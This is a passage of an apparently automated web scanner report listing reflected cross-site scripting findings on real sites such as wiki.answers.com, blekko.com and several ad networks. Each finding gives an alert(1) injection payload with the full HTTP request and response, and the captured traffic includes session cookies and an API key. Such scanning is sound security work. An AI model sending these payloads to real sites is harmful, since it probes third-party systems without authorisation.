3.506. http://wiki.answers.com/Q/FAQ/2637/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04ca"><script>alert(1)</script>1e97e1450d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637/x26amp?f04ca"><script>alert(1)</script>1e97e1450d6=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=a5sui7s5guog0npukb22o6fja3; path=/; domain=.answers.com
Set-Cookie: a5sui7s5guog0npukb22o6fja3=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:27:51 GMT
X-Varnish: 519894247
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151015


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q/FAQ/2637/x26amp?f04ca"><script>alert(1)</script>1e97e1450d6=1" target="_top">
...[SNIP]...

3.507. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4519c<script>alert(1)</script>988454ab8a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 4519c<script>alert(1)</script>988454ab8a6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 19 Apr 2011 16:09:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 4519c<script>alert(1)</script>988454ab8a6

3.508. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab0fd"-alert(1)-"d8714f56330 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=177784&siteID=glamcom&creativeID=1467968&placementID=1248525&adexpansion=0&click=0 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: ab0fd"-alert(1)-"d8714f56330
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 615
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2648=178074,178074; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178074=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2648=4%2f20%2f2011+9%3a42%3a49+PM; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2648=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 21 Apr 2011 01:57:31 GMT
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:57:31 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='fun
...[SNIP]...
InviteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=ab0fd"-alert(1)-"d8714f56330&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968";document.getElementsByTagName('head')[0].appendChild(s);}})();

3.509. http://ib.adnxs.com/ttj [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd58'-alert(1)-'8a44710014e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=396985&pubclick=http://xads.zedo.com/ads2/c%3Fa%3D895737%3Bx%3D2304%3Bg%3D172%3Bc%3D305005852%2C305005852%3Bi%3D0%3Bn%3D305%3Bi%3D0%3Bu%3DjhmxpQoBADYAAET@BzgAAAAW%7E022111%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D421%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.2778043581638485%3Bp%3D8%3Bf%3D1093076%3Bh%3D1093075%3Bo%3D20%3By%3D331%3Bv%3D1%3Bt%3Di%3Bk= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6dd58'-alert(1)-'8a44710014e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI93oQChgBIAEoATD7w4vrBBD7w4vrBBgA; uuid2=4470455573253905340; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ic[d6CGz9%wPyKtR:Oy7D34Qm3(6eds:*nw[M7fUB%t6ySwO$b4u(JNrEJOXfpGHm(!<YP8ub*=t

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 24-Feb-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIr7gCEAoYASABKAEws4KW6wQQs4KW6wQYAA..; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 23 Feb 2011 21:50:43 GMT
Content-Length: 1050

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=eNFXkGYssj940VeQZiyyPwAAAMDMzPw_eNFXkGY
...[SNIP]...
%28%27r%27%2C+202232%2C+1298497843%29%3B&cnd=!gBqf3QiyggMQ-KsMGAAg8fgCKAAxeNFXkGYssj9CEwgAEAAYACABKP7__________wFCDQjIPhD2bhibEyACKAVIA1AAWP4DYANo5gI.&referrer=http://www.google.com/search%3Fhl=en%26q=6dd58'-alert(1)-'8a44710014e">
...[SNIP]...

3.510. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519b1"-alert(1)-"9a5bdb36e23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:10 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EB5FA52EB4321C340AE3FB80FA0E3631; Path=/
Connection: keep-alive
Content-Length: 8363


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "fa
...[SNIP]...

3.511. http://a.collective-media.net/cmadj/manta.comp/energy_resources [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aae1"%3balert(1)//9f276e0ea99 was submitted in the cli cookie. This input was echoed as 6aae1";alert(1)//9f276e0ea99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac76aae1"%3balert(1)//9f276e0ea99; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:23 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:23 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:23 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT
Content-Length: 8118

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11e4f07c0988ac76aae1";alert(1)//9f276e0ea99&seg_code=noseg&ord=1298679563",true);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&reppipe=,&edr=off&repequal=_&ru=http%3A%2F%2Fa.collective-media.net%2Fdatapair%
...[SNIP]...

3.512. http://blekko.com/join [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /join

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360f1"><script>alert(1)</script>49dd0235738 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /join?360f1"><script>alert(1)</script>49dd0235738=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Apr 2011 16:01:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 113
Location: https://blekko.com/join?360f1"><script>alert(1)</script>49dd0235738=1
X-Blekko-PT: eeda6c0826ee544726ecc89b0c43b4dd

The document has moved <a href="https://blekko.com/join?360f1"><script>alert(1)</script>49dd0235738=1">here</a>.

3.513. http://blekko.com/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a31"><script>alert(1)</script>120b30675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /login?71a31"><script>alert(1)</script>120b30675c=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Apr 2011 16:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 113
Location: https://blekko.com/login?71a31"><script>alert(1)</script>120b30675c=1
X-Blekko-PT: 2758bb8e72becdda20b423bab514421e

The document has moved <a href="https://blekko.com/login?71a31"><script>alert(1)</script>120b30675c=1">here</a>.

3.514. http://d.chango.com/collector/admeldpixel [_t cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the _t cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 180aa'-alert(1)-'2b99ebe76a7 was submitted in the _t cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe180aa'-alert(1)-'2b99ebe76a7; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "f24a679f59908bd93657366d15575ed95b176a03"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe180aa'-alert(1)-'2b99ebe76a7; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe180aa'-alert(1)-'2b99ebe76a7';

3.515. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 85e58<script>alert(1)</script>0dca2365492 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?fpc=c428de2-12e59391fd7-2d50293c-2&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==85e58<script>alert(1)</script>0dca2365492

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 24 Feb 2011 19:50:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1195


           <html>
           <head><title>ShareThis Segmenter</title></head>
           <body>
           
           No Segment
           <script type="text/javascript">
                   var ref=document.referrer;var lurl = (("https:" == document.location.p
...[SNIP]...
<div style='display:none'>clicookie:CszLBk1bK3ITLgrkJKQWAg==85e58<script>alert(1)</script>0dca2365492
userid:
</div>
...[SNIP]...

3.516. http://tag.admeld.com/ad/json/100/glammedia/160x600/367631667 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/160x600/367631667

Issue detail

The value of the meld_sess cookie is copied into the HTML document as plain text between tags. The payload b4964<script>alert(1)</script>e017567acbc was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/json/100/glammedia/160x600/367631667?url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD76212205993 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9b4964<script>alert(1)</script>e017567acbc; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgMjA1MDM1OSwgIG5ldHdvcms6ICAgICAgImNvbGxlY3RpdmUiLCAgc2l6ZTogICAgICAgICAiMTYweDYwMCIsICBmcmVxOiAgICAgICAgICIxLTMiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjcyOTI1MDQxLTc1ZDctNDc4Ni04MTFjLWY3YWI0MTMyYzZiMyIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjliNDk2NDxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD5lMDE3NTY3YWNiYyIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiMzY3NjMxNjY3IiwgIGRpdjogICAgICAgICAgIjcyOTI1MDQxLTc1ZDctNDc4Ni04MTFjLWY3YWI0MTMyYzZiMyIsICB1cmw6ICAgICAgICAgICJodHRwOi8vcG9wb250aGVwb3AuY29tLzIwMTEvMDQvbGluZHNheS1sb2hhbi1sb3Nlcy12aWN0b3JpYS1nb3R0aS1yb2xlLyIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIsICBhY2NvdW50X2lkOiAgIDI2OTgsICBuZXR3b3JrX25hbWU6ICJDb2xsZWN0aXZlIE1lZGlhIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZ2xhbSIsICBlY3BtOiAgICAgICAgICIwLjg0IiwgIGZlY3BtOiAgICAgICAgIjAuODQiLCAgZmlsbDogICAgICAgICAiOTIuMTIiLCAgcGxhY2VtZW50OiAgICAiMzY3NjMxNjY3IiwgIHJ1bGU6ICAgICAgICAgIjM2NzYzMTY2NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjM0NDE0LCAiYnV5IjoxNzcsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTMzNTE4LCAiYnV5Ijo1MDIsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjI5NzEyNywgImJ1eSI6MTI0MiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJYQS5uZXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyNjIyMDYsICJidXkiOjIwMzgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiQWN1aXR5IEFkcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjE0OTIyNzIsICJidXkiOjUyMDgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJFcWFkcyAoU